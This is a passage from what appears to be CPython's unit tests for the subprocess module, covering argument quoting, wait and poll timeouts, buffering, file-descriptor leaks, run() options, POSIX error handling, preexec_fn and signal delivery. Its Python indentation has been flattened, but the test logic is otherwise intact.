self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
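        # list2cmdline() quotes arguments using the MS C runtime rules; these
        # cases cover spaces, embedded quotes, backslashes and empty strings.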
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
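        # poll() returns None while the child is still blocked reading stdin;
        # once we write a byte and wait(), it returns the exit status.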
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
        # The line is flushed in text mode with bufsize=1,
        # so we should get the full line back.
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
        # The line is not flushed in binary mode with bufsize=1,
        # so we should get an empty response.
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
        # When a race condition occurs in wait(), the returncode could
        # be set by a thread that did not actually reap the child,
        # leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
    # For simplicity this test is Linux-specific, just to get at least some
    # coverage; the underlying bug is not platform specific.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
class RunFuncTestCase(BaseTestCase):
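    # Tests for the high-level subprocess.run() API: returncode handling,
    # timeouts, output capture and path-like arguments.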
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
        # run() can be called with the input argument set to bytes
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
        # the name of a command that can be run without
        # any arguments and that exits quickly
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
            # This avoids hard coding the errno value or the OS perror()
            # string and instead captures the exception that we want to see
            # below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
    # to do that.
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
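            # fork_exec() receives the errpipe write end as its 14th
            # positional argument in this CPython version, hence args[13].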
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
            # Anything can be in the pipe; no assumptions should be made
            # about its encoding, so we'll write some arbitrary raw bytes
            # to test it out.
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
        # For code coverage of calling setsid().  We don't care if we get an
        # EPERM error from it depending on the test execution environment;
        # either way it still indicates that setsid() was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
        # We're relying on the repr() of the signal.Signals IntEnum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
